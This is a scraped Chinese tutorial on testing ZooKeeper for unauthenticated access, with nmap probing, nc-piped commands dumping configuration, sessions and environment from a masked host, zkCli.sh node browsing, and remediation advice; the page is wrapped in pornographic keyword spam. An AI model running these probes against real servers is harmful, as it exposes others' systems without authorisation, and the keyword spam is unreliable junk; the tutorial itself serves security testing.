婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > Zookeeper未授權訪問測試問題

Zookeeper未授權訪問測試問題

熱門標簽:AI電銷機器人 源碼 高德地圖標注論壇 蘭州ai電銷機器人招商 新科美甲店地圖標注 北海市地圖標注app 新邵電銷機器人企業 外呼系統打哪顯哪 江西外呼系統 湖北ai智能電銷機器人

前言

  ZooKeeper是一個分布式的,開放源碼的分布式應用程序協調服務,是Google的Chubby一個開源的實現,是Hadoop和Hbase的重要組件。它是一個為分布式應用提供一致性服務的軟件,提供的功能包括:配置維護、域名服務、分布式同步、組服務等。

  zookeeper 未授權訪問是指安裝部署之后默認情況下不需要任何身份驗證,從而導致 zookeeper 被遠程利用,導致大量服務級別的信息泄露。

  默認使用端口:2181、2182。

探測Zookeeper服務開放

  如使用nmap探測某個目標地址是否運行Zookeeper服務,探測2181端口開放。

root@kali:~# nmap -Pn -p 2181 xx.xx.xx.xx
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-21 01:56 EDT
Nmap scan report for xx.xx.xx.xx.static.sz.js.chinamobile.com (xx.xx.xx.xx)
Host is up (0.016s latency).

PORT   STATE SERVICE
2181/tcp open eforward

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

  批量探測僅需修改一下對應的目標地址即可。

獲取信息

conf命令

  輸出相關服務配置的詳細信息,端口、數據路徑、日志路徑、session 超時時間,最大連接數等。

root@kali:~# echo conf | nc xx.xx.xx.xx 2181
clientPort=2171
dataDir=/opt/data/zookeeper/data/version-2
dataLogDir=/opt/data/zookeeper/data/version-2
tickTime=2000
maxClientCnxns=0
minSessionTimeout=4000
maxSessionTimeout=40000
serverId=0

cons命令

  列出所有連接到當前服務器的客戶端/會話的詳細信息。

root@kali:~# echo cons | nc xx.xx.xx.xx 2181 | more
/10.23.46.40:11958[1](queued=0,recved=27317,sent=27317,sid=0x1000000e029b16e,lop=PING,est=1571277639586,to=40000,lcxid=0x33,lzxid=0x286a720,lresp=2435779043,llat=0,minlat=0,avglat=0,maxlat=397)
/10.23.46.39:9688[1](queued=0,recved=27316,sent=27316,sid=0x1000000e029b17c,lop=PING,est=1571277641790,to=40000,lcxid=0x33,lzxid=0x286a71c,lresp=2435777895,llat=0,minlat=0,avglat=0,maxlat=560)

dump命令

  輸出未處理的會話和臨時節點,leader 節點有效。

root@kali:~# echo dump | nc xx.xx.xx.xx 2181 | more
SessionTracker dump:
Session Sets (21):
0 expire at Thu Jan 29 12:38:08 CST 1970:
0 expire at Thu Jan 29 12:38:10 CST 1970:
3 expire at Thu Jan 29 12:38:12 CST 1970:
0x1000000e01f0013
0x1000000e029fdde
0x1000000e029fe05
2 expire at Thu Jan 29 12:38:14 CST 1970:
0x1000000e02a4235
0x1000000e01f00e9
31 expire at Thu Jan 29 12:38:16 CST 1970:
0x1000000e01f067a
0x1000000e02a423c
0x1000000e01f0008
0x1000000e029fdf4
...

  非 leader 節點看不到什么相關信息。

envi命令

  輸出服務器的詳細信息。

root@kali:~# echo envi | nc xx.xx.xx.xx 2181
Environment:
zookeeper.version=3.4.13-2d71af4dbe22557fda74f9a9b4309b15a7487f03, built on 06/29/2018 04:05 GMT
host.name=c1b69852-ac24-11e8-88d9-a4bf01306d06
java.version=1.7.0_80
java.vendor=Oracle Corporation
java.home=/usr/java/jdk1.7.0_80/jre
java.class.path=/opt/midware/zookeeper/bin/../build/classes:/opt/midware/zookeeper/bin/../build/lib/*.jar:/opt/midware/zookeeper/bin/../lib/slf4j-log4j12-1.7.25.jar:/opt/midware/zookeeper/bin/../lib/slf4j-api-1.7.25.jar:/opt/midware/zookeeper/bin/../lib/netty-3.10.6.Final.jar:/opt/midware/zookeeper/bin/../lib/log4j-1.2.17.jar:/opt/midware/zookeeper/bin/../lib/jline-0.9.94.jar:/opt/midware/zookeeper/bin/../lib/audience-annotations-0.5.0.jar:/opt/midware/zookeeper/bin/../zookeeper-3.4.13.jar:/opt/midware/zookeeper/bin/../src/java/lib/*.jar:/opt/midware/zookeeper/bin/../conf:
java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
java.io.tmpdir=/tmp
java.compiler=<NA>
os.name=Linux
os.arch=amd64
os.version=3.10.0-327.36.3.el7.x86_64
user.name=root
user.home=/root
user.dir=/

連接測試

安裝工具

  如在kali下,可以用如下命令安裝zookeeper工具,之后即可使用客戶端連接工具zkCli.sh。

# apt-get install zookeeper
...
#root@kali:~# cd /usr/share/zookeeper/bin/
#root@kali:/usr/share/zookeeper/bin# ls
zkCleanup.sh zkCli.sh zkEnv.sh zkServer.sh

連接目標

  使用-server參數指定目標即可連接。

root@kali:/usr/share/zookeeper/bin# ./zkCli.sh -server xx.xx.xx.xx:2181
Connecting to xx.xx.xx.xx:2181
Welcome to ZooKeeper!
JLine support is enabled
[zk: xx.xx.xx.xx:2181(CONNECTING) 0]

... 已連接

獲取系統相關信息

root@kali:/usr/share/zookeeper/bin# ./zkCli.sh -server xx.xx.xx.xx:2181
Connecting to xx.xx.xx.xx:2181
Welcome to ZooKeeper!
JLine support is enabled
[zk: xx.xx.xx.xx:2181(CONNECTING) 0]
WATCHER::
WatchedEvent state:SyncConnected type:None path:null
[zk: xx.xx.xx.xx:2181(CONNECTED) 0] ls /
[service, pms, DsMaster, Resource, monitor_lock, zookeeper]
[zk: xx.xx.xx.xx:2181(CONNECTED) 1] get /
cZxid = 0x0
ctime = Wed Dec 31 19:00:00 EST 1969
mZxid = 0x0
mtime = Wed Dec 31 19:00:00 EST 1969
pZxid = 0x4c0
cversion = 4
dataVersion = 0
aclVersion = 0
ephemeralOwner = 0x0
dataLength = 0
numChildren = 6
[zk: xx.xx.xx.xx:2181(CONNECTED) 2] get /service
cZxid = 0x2
ctime = Thu Aug 30 02:58:40 EDT 2018
mZxid = 0x2
mtime = Thu Aug 30 02:58:40 EDT 2018
pZxid = 0x1cb884d
cversion = 7
dataVersion = 0
aclVersion = 0
ephemeralOwner = 0x0
dataLength = 0
numChildren = 3
[zk: xx.xx.xx.xx:2181(CONNECTED) 3] getAcl /
'world,'anyone
: cdrwa

修復方案

1、設置防火墻策略限制 IP 訪問【建議采取此種方案】

2、不要將 zookeeper 暴露在外網

3、設置用戶認證和 ACL

參考

  zookeeper 未授權訪問

     http://vic.pub/zookeeper-未授權訪問/

總結

以上所述是小編給大家介紹的Zookeeper未授權訪問測試問題,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對腳本之家網站的支持!
如果你覺得本文對你有幫助,歡迎轉載,煩請注明出處,謝謝!

標簽:池州 自貢 海南 南陽 阿克蘇 黃石 大理 黔東

巨人網絡通訊聲明:本文標題《Zookeeper未授權訪問測試問題》,本文關鍵詞  Zookeeper,未,授權,訪問,測試,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《Zookeeper未授權訪問測試問題》相關的同類信息!
  • 本頁收集關于Zookeeper未授權訪問測試問題的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    一区二区三区日韩精品| 亚洲国产精华液网站w| 在线观看视频一区二区欧美日韩| 亚洲女子a中天字幕| 亚洲精品在线观看视频| 久久日一线二线三线suv| 国产精品天干天干在线综合| 亚洲女人****多毛耸耸8| 五月婷婷综合网| 免费欧美在线视频| 麻豆久久一区二区| av中文字幕不卡| 制服.丝袜.亚洲.中文.综合| 欧美精品一区二区三区蜜桃视频| 激情都市一区二区| 成人高清视频免费观看| 欧美性色欧美a在线播放| 欧美美女一区二区在线观看| 日韩精品中文字幕在线不卡尤物| 成人免费毛片片v| 欧美丰满嫩嫩电影| 3d动漫精品啪啪一区二区竹菊| 久久精品国产秦先生| 日本色综合中文字幕| 成人app软件下载大全免费| 欧美另类高清zo欧美| 国产精品麻豆视频| 另类专区欧美蜜桃臀第一页| 成人自拍视频在线观看| 91精品国产欧美日韩| 亚洲精品乱码久久久久久久久| 欧美日韩和欧美的一区二区| 欧美老女人在线| 国产欧美一区二区精品性色超碰| 在线观看免费一区| 日韩欧美成人一区| 亚洲电影视频在线| 色网综合在线观看| 国产精品乱人伦中文| 亚洲一区二区视频在线| 国产99久久久国产精品潘金网站| 国产精品正在播放| 欧美色综合网站| 最新中文字幕一区二区三区 | 成人avav影音| 在线不卡的av| 欧美高清在线视频| 男男成人高潮片免费网站| 欧美视频一区二区| 亚洲欧美国产77777| www.亚洲精品| 久久久久久一二三区| 麻豆精品久久精品色综合| 欧美伊人精品成人久久综合97| 欧亚一区二区三区| 日韩欧美另类在线| 亚洲成av人**亚洲成av**| 97久久精品人人做人人爽| 国产精品污网站| 国产91高潮流白浆在线麻豆| 五月激情六月综合| 在线欧美小视频| 国产精品国产馆在线真实露脸 | 日韩欧美一级特黄在线播放| 一区二区三区欧美| 欧美伊人久久大香线蕉综合69| 91影院在线观看| 日韩一区在线免费观看| 成人免费黄色大片| 精品国产乱码久久久久久闺蜜| 欧美区在线观看| 亚洲成国产人片在线观看| 69堂亚洲精品首页| 热久久国产精品| 久久久久久久久久久久久夜| 国产精品亚洲а∨天堂免在线| 91在线精品一区二区| **网站欧美大片在线观看| 99久久免费视频.com| 亚洲欧美日韩国产综合| 欧美日本在线看| 九一九一国产精品| 国产精品成人一区二区三区夜夜夜| 樱桃视频在线观看一区| 91九色02白丝porn| 久久99精品国产麻豆婷婷| 久久久美女艺术照精彩视频福利播放| 国产精品免费久久| 国产精品亚洲成人| 亚洲综合视频网| 日韩视频永久免费| 成人国产在线观看| 亚洲福中文字幕伊人影院| 日韩精品自拍偷拍| 91麻豆免费看| 久久激情五月激情| 亚洲欧洲精品一区二区三区| 91精品黄色片免费大全| 国产+成+人+亚洲欧洲自线| 亚洲小说春色综合另类电影| 日韩欧美高清dvd碟片| 色综合欧美在线| 久久成人av少妇免费| 中文字幕亚洲欧美在线不卡| 欧美日韩精品一区视频| 美女看a上一区| 亚洲精品视频一区| 欧美视频一区二区三区| 国产一区二区h| 亚洲男人的天堂一区二区| 亚洲精品一区二区三区影院| 国产成人av一区二区三区在线| 欧美精品一区二区三区蜜臀| a4yy欧美一区二区三区| 日韩黄色免费网站| 日韩理论片一区二区| 精品国产乱码久久久久久图片| 亚洲成人福利片| 日韩精品中文字幕在线一区| 在线亚洲一区观看| 蜜桃一区二区三区在线观看| 国产片一区二区| 精品久久五月天| 91福利精品视频| 国产91精品露脸国语对白| 久久国产精品99精品国产| 亚洲精品国产第一综合99久久| 成人免费观看av| 麻豆视频一区二区| 亚洲精品乱码久久久久久黑人| 欧美日韩一区精品| caoporen国产精品视频| 国产综合色在线视频区| 日韩精品91亚洲二区在线观看| 精品国产成人在线影院 | 在线免费观看一区| 国产揄拍国内精品对白| 美女视频黄频大全不卡视频在线播放| 91丨porny丨首页| 国产另类ts人妖一区二区| 风间由美一区二区三区在线观看 | 国产亚洲综合色| 欧美一二三区在线| 4438x成人网最大色成网站| 欧美日韩高清一区二区不卡| 色婷婷综合久久久久中文 | 亚洲一区二区三区精品在线| 久久综合色之久久综合| 欧美成人乱码一区二区三区| 欧美成人艳星乳罩| 欧美人牲a欧美精品| 97久久精品人人做人人爽| 成人av电影免费在线播放| 大白屁股一区二区视频| av男人天堂一区| 国产成人av自拍| 99精品视频在线播放观看| 99视频精品在线| 欧美主播一区二区三区| 欧美电影一区二区| 欧美精品一二三区| 日韩免费观看高清完整版| 久久人人超碰精品| 国产日韩精品一区| 亚洲女与黑人做爰| 亚洲另类春色校园小说| 亚洲欧美成人一区二区三区| 国产精品久久看| 有坂深雪av一区二区精品| 一区二区在线观看视频| 视频在线观看91| 国产在线精品一区二区| 日韩电影网1区2区| 亚洲国产精品久久一线不卡| 欧美aaa在线| 激情综合色丁香一区二区| 国产91精品欧美| 日本韩国视频一区二区| 欧美性欧美巨大黑白大战| 在线播放一区二区三区| 日韩欧美综合一区| 中文一区二区在线观看| 亚洲综合免费观看高清完整版在线| 欧美综合亚洲图片综合区| 欧美日韩国产影片| 久久精品国产成人一区二区三区| 亚洲综合视频在线观看| 天堂在线一区二区| 国产成人三级在线观看| 欧美日韩黄色影视| 久久er精品视频| 99re亚洲国产精品| 这里是久久伊人| 中文字幕在线观看不卡视频| 日韩中文字幕1| 国产成人av资源| 欧美一区二区三区免费在线看 | 99riav一区二区三区| 欧美日韩视频在线观看一区二区三区 | 99这里只有精品|